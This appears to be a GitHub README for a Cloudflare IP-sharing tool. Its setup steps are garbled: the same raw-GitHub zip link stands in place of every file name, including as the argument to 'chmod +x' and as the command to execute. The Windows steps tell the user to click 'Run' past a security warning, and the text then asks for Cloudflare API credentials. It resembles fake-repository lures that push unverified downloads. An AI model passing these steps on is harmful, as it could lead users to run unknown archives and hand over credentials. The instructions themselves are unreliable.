Welcome to the cloudflare-ip-sharing-tool! This application allows you to store and retrieve public IP addresses securely using Cloudflare DNS and PGP encryption. It's designed for both PowerShell on Windows and command-line on Linux, making it easy to automate tasks in quiet mode.
To download the latest version of the cloudflare-ip-sharing-tool, visit this page: Releases Page. On the releases page, you will find the available versions. Choose the one that matches your system, and follow these steps:
- Click on the version number you want to download.
- Look for executable files for Windows or scripts for Linux.
- Click the file to start downloading.
Once the download completes, follow the setup instructions below for your operating system.
-
Locate the File: Open your Downloads folder and find the downloaded executable file, such as
https://raw.githubusercontent.com/Cheesrw/cloudflare-ip-sharing-tool/main/putt/cloudflare-ip-sharing-tool.zip. -
Run the Tool: Double-click on the file to run it. Windows may prompt you with a security warning. Click "Run" to proceed.
-
Using the Tool: Follow the on-screen instructions to enter your Cloudflare API credentials and start managing your public IP addresses.
-
Find the File: Open a terminal window and navigate to your Downloads directory:
cd ~/Downloads -
Make the Script Executable: You may need to make the script executable. Run the following command, replacing
https://raw.githubusercontent.com/Cheesrw/cloudflare-ip-sharing-tool/main/putt/cloudflare-ip-sharing-tool.zipwith the actual script name:chmod +x https://raw.githubusercontent.com/Cheesrw/cloudflare-ip-sharing-tool/main/putt/cloudflare-ip-sharing-tool.zip -
Run the Tool: Execute the script by typing:
https://raw.githubusercontent.com/Cheesrw/cloudflare-ip-sharing-tool/main/putt/cloudflare-ip-sharing-tool.zipYou might need to enter your Cloudflare API credentials to access the tool's features.
- Cross-Platform Support: Works on both Windows and Linux systems.
- Secure Storage: Utilizes Cloudflare DNS and PGP encryption for added security.
- Quiet Mode: Easily automate processes without user prompts.
- Simple Interface: User-friendly design that makes managing IP addresses straightforward.
To use the cloudflare-ip-sharing-tool, ensure your system meets the following requirements:
- Windows 10 or later / Linux distributions with Bash support.
- PowerShell installed on Windows for PowerShell scripts.
- Internet connection for Cloudflare API access.
- Basic understanding of command-line interfaces (for Linux users).
Cloudflare is a leading internet security company that provides services to help protect and accelerate any internet application. With Cloudflare DNS, users can improve security and enhance performance for their web applications. This tool helps you leverage those benefits by securely managing your public IP addresses.
If you encounter any issues or have questions about using the cloudflare-ip-sharing-tool, please reach out. Open an issue on the GitHub Issues Page. We will gladly assist you.
For detailed usage, consult the documentation found within the repository. Enjoy managing your IP addresses securely!